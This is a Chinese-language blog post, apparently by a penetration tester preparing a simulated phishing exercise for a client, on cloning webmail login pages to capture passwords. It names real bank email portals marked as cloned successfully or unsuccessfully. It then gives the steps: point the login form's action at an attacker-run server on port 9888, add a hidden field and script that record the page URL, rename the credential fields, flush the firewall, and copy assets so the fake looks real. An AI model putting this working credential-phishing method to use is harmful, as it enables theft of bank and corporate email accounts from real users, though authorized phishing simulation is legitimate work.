<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ithedogl.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="不知道欧婉鑫喝奶茶喝胖没。">
<meta property="og:type" content="article">
<meta property="og:title" content="网站克隆钓账密">
<meta property="og:url" content="https://ithedogl.github.io/2022/01/25/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/index.html">
<meta property="og:site_name" content="沉沦">
<meta property="og:description" content="不知道欧婉鑫喝奶茶喝胖没。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125152906874.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125153054589.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162729681.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160300100.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160329093.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160430920.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160535143.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160947435.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161012196.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161252323.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161316232.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161442744.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161559851.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161617880.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161720110.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161949489.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162044663.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162108296.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162409994.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162436747.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162456809.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162459245.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125165908266.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170210854.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170150521.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170405107.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127100400718.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127100534887.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127101755199.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127101831010.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164316834.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164343148.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164601724.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164622321.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164657128.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127170528187.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127144904924.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145139373.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145309954.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145831519.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150203229.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150219159.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127171758765.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150332232.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150901171.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150912662.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152526542.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152703069.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152908000.png">
<meta property="og:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127153005051.png">
<meta property="article:published_time" content="2022-01-25T07:10:14.150Z">
<meta property="article:modified_time" content="2022-01-30T13:47:47.076Z">
<meta property="article:author" content="thedog">
<meta property="article:tag" content="钓鱼">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ithedogl.github.io/images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125152906874.png">

<link rel="canonical" href="https://ithedogl.github.io/2022/01/25/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>网站克隆钓账密 | 沉沦</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">沉沦</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ithedogl.github.io/2022/01/25/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="thedog">
      <meta itemprop="description" content="笑一个">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="沉沦">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          网站克隆钓账密
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-01-25 15:10:14" itemprop="dateCreated datePublished" datetime="2022-01-25T15:10:14+08:00">2022-01-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-01-30 21:47:47" itemprop="dateModified" datetime="2022-01-30T21:47:47+08:00">2022-01-30</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/01/25/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/01/25/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">不知道欧婉鑫喝奶茶喝胖没。</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>起因是客户有个模拟账密钓鱼的业务需求，奈何自己是条菜狗，本来想着用gophish实现，试了几个互联网目标发现效果不太理想，去现场一试果然傻眼。实际上gophish绝大多数情况下并非仅通过Import就能够达到理想下的克隆。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">163邮箱失败，可以克隆，提交登录提示网络请求错误，无法记录账密。	https:&#x2F;&#x2F;mail.163.com&#x2F;</span><br><span class="line"></span><br><span class="line">qq邮箱失败，访问克隆页面跳转qq邮箱界面。	https:&#x2F;&#x2F;mail.qq.com&#x2F;</span><br><span class="line"></span><br><span class="line">广州银行企业邮箱成功，克隆页面、账密记录，点击定位	http:&#x2F;&#x2F;mail.gzcb.com.cn&#x2F;webmail&#x2F;login&#x2F;login.do</span><br><span class="line"></span><br><span class="line">台州coremail邮箱失败，无法克隆。	https:&#x2F;&#x2F;mail.tzbank.com&#x2F;</span><br><span class="line"></span><br><span class="line">徽商coremail失败，无法克隆。	https:&#x2F;&#x2F;mail.hsbank.com.cn&#x2F;</span><br><span class="line"></span><br><span class="line">烟台银行成功 https:&#x2F;&#x2F;mail.yantaibank.net&#x2F;coremail&#x2F;index.jsp</span><br><span class="line"></span><br><span class="line">中国农业发展银行成功 https:&#x2F;&#x2F;mail.adbc.com.cn&#x2F;</span><br><span class="line"></span><br><span class="line">浙江稠州商业银行失败	https:&#x2F;&#x2F;mail.czcb.com.cn&#x2F;</span><br><span class="line"></span><br><span class="line">东莞农村商业银行企业邮箱coremail失败 https:&#x2F;&#x2F;mail.drcbank.com&#x2F;</span><br><span class="line"></span><br><span class="line">盛京银行邮件系统失败 乱码，无法记录账密 https:&#x2F;&#x2F;mail.shengjingbank.com.cn&#x2F;</span><br></pre></td></tr></table></figure>



<p>我滴超人欧婉鑫大佬登场！</p>
<h2 id="网站克隆"><a href="#网站克隆" class="headerlink" title="网站克隆"></a>网站克隆</h2><p>先访问网站然后使用ctrl+s保存，本地打开访问一下</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125152906874.png" alt="image-20220125152906874"></p>
<p>本地是用file协议访问的，但是打开后立马跳转到https协议了，编辑器打开html页面，找到关键代码然后修改</p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125153054589.png" alt="image-20220125153054589"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162729681.png" alt="image-20220125162729681"></p>
<p>把第一个https改成file然后再用file协议打开就不会跳转https，后面上线时肯定要改成http。</p>
<h3 id="修改数据接收服务器"><a href="#修改数据接收服务器" class="headerlink" title="修改数据接收服务器"></a>修改数据接收服务器</h3><p>在输⼊框标签处修改属性action，把action值改为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;服务器IP:9888&#x2F;mail&#x2F;login</span><br></pre></td></tr></table></figure>

<p>搜了一下发现有两个action</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160300100.png" alt="image-20220125160300100"></p>
<p>登录一下发现用的是第二个，那就改第二个，后面都改的是第二个</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160329093.png" alt="image-20220125160329093"></p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160430920.png" alt="image-20220125160430920"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160535143.png" alt="image-20220125160535143"></p>
<h3 id="增加传输参数"><a href="#增加传输参数" class="headerlink" title="增加传输参数"></a>增加传输参数</h3><p>在⽤户名密码接收框标签下再增加⼀句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input type&#x3D;&quot;hidden&quot; name&#x3D;&quot;id&quot; value&#x3D;&quot;location.href&quot; id&#x3D;&quot;location-href&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125160947435.png" alt="image-20220125160947435"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161012196.png" alt="image-20220125161012196"></p>
<p>增加</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language&#x3D;&quot;JavaScript&quot;&gt;</span><br><span class="line">const locationHrefInput &#x3D; document.getElementById(&#39;location-href&#39;);</span><br><span class="line">locationHrefInput.value &#x3D; location.href;</span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>



<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161252323.png" alt="image-20220125161252323"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161316232.png" alt="image-20220125161316232"></p>
<p>增加该段js后再访问html就会出现一个ca窗口</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161442744.png" alt="image-20220125161442744"></p>
<p>找到该段div删除</p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161559851.png" alt="image-20220125161559851"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161617880.png" alt="image-20220125161617880"></p>
<p>发现ca窗口没了，登录框也没了</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161720110.png" alt="image-20220125161720110"></p>
<p>因为是每修改一步，就会刷新html页面一次查看效果，所以很容易知道是该段js的问题。之前这段js是放在密码框下，测试放登录框下，登录框就不会消失。</p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125161949489.png" alt="image-20220125161949489"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162044663.png" alt="image-20220125162044663"></p>
<p>登录按钮又出现了</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162108296.png" alt="image-20220125162108296"></p>
<p>另外要修改html中用户名、密码的name和id。</p>
<p>用户名都用username，密码都用password。</p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162409994.png" alt="image-20220125162409994"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162436747.png" alt="image-20220125162436747"></p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162456809.png" alt="image-20220125162456809"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125162459245.png" alt="image-20220125162459245"></p>
<p>服务器要搭建apache中间件，把上面文件传到web路径下，保证上面页面能用http访问即可，要求可以开放80和9888端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">iptables -F</span><br></pre></td></tr></table></figure>

<p>访问发现很多404文件，从原网站下载相关文件放到克隆服务器上对应的web路径下。</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125165908266.png" alt="image-20220125165908266"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170210854.png" alt="image-20220125170210854"></p>
<p>再访问效果就会好很多</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170150521.png" alt="image-20220125170150521"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220125170405107.png" alt="image-20220125170405107"></p>
<p>左上角还有个图标不正常，查看元素发现是在这里，在克隆服务器上新建相同的目录，然后找到源文件传上去即可</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127100400718.png" alt="image-20220127100400718"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127100534887.png" alt="image-20220127100534887"></p>
<p>现在效果就比较nice了，之前效果就是做到这一步，登录框那里还有点瑕疵</p>
<p>原版</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127101755199.png" alt="image-20220127101755199"></p>
<p>改版</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127101831010.png" alt="image-20220127101831010"></p>
<p>对完线继续，图标彭老版研究出来怎么替换了，以头像为例。</p>
<p><a target="_blank" rel="noopener" href="https://www.iconfont.cn/%E7%BD%91%E7%AB%99%E6%90%9C%E5%A4%B4%E5%83%8F%E7%84%B6%E5%90%8E%E5%8A%A0%E5%85%A5%E8%B4%AD%E7%89%A9%E8%BD%A6%EF%BC%8C%E4%B8%8B%E8%BD%BD%E4%BB%A3%E7%A0%81%E3%80%82">https://www.iconfont.cn/网站搜头像然后加入购物车，下载代码。</a></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164316834.png" alt="image-20220127164316834"></p>
<p>下载之后是这些内容</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164343148.png" alt="image-20220127164343148"></p>
<p>全部复制到files中，已有就替换。</p>
<p>打开iconfont.css找到图标名，把以前的图标名改为下载好的图标名即可。</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164601724.png" alt="image-20220127164601724"></p>
<p>前</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164622321.png" alt="image-20220127164622321"></p>
<p>后</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127164657128.png" alt="image-20220127164657128"></p>
<p>全部改完的效果</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127170528187.png" alt="image-20220127170528187"></p>
